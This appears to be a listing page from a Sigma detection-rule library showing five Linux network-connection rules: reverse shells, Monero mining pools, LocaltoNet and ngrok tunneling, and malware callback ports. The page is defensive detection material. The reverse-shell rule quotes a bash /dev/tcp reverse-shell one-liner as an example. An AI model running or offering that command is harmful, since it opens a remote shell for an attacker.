Phoenix
Sigma IntelligenceBeta
Rule Library

Sigma Rules

5 rules found

3,707Total
3,116Detection
451Emerging
137Hunting
Detectioncriticaltest

Linux Reverse Shell Indicator

Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')

LinuxNetwork Connection
TA0002 · ExecutionT1059.004 · Unix Shell
Florian Roth (Nextron Systems)Sat Oct 16linux
Detectionhighstable

Linux Crypto Mining Pool Connections

Detects process connections to a Monero crypto mining pool

LinuxNetwork Connection
TA0040 · ImpactT1496 · Resource Hijacking
Florian Roth (Nextron Systems)Tue Oct 26linux
Detectionhightest

Communication To LocaltoNet Tunneling Service Initiated - Linux

Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.

LinuxNetwork Connection
TA0011 · Command and ControlT1572 · Protocol TunnelingT1090 · ProxyT1102 · Web Service
Andreas Braathen (mnemonic.io)Mon Jun 17linux
Detectionhightest

Communication To Ngrok Tunneling Service - Linux

Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors

LinuxNetwork Connection
TA0010 · ExfiltrationTA0011 · Command and ControlT1567 · Exfiltration Over Web ServiceT1568.002 · Domain Generation Algorithms+4
Florian Roth (Nextron Systems)Thu Nov 03linux
Detectionhightest

Potentially Suspicious Malware Callback Communication - Linux

Detects programs that connect to known malware callback ports based on threat intelligence reports.

LinuxNetwork Connection
TA0003 · PersistenceTA0011 · Command and ControlT1571 · Non-Standard Port
hasseljFri May 10linux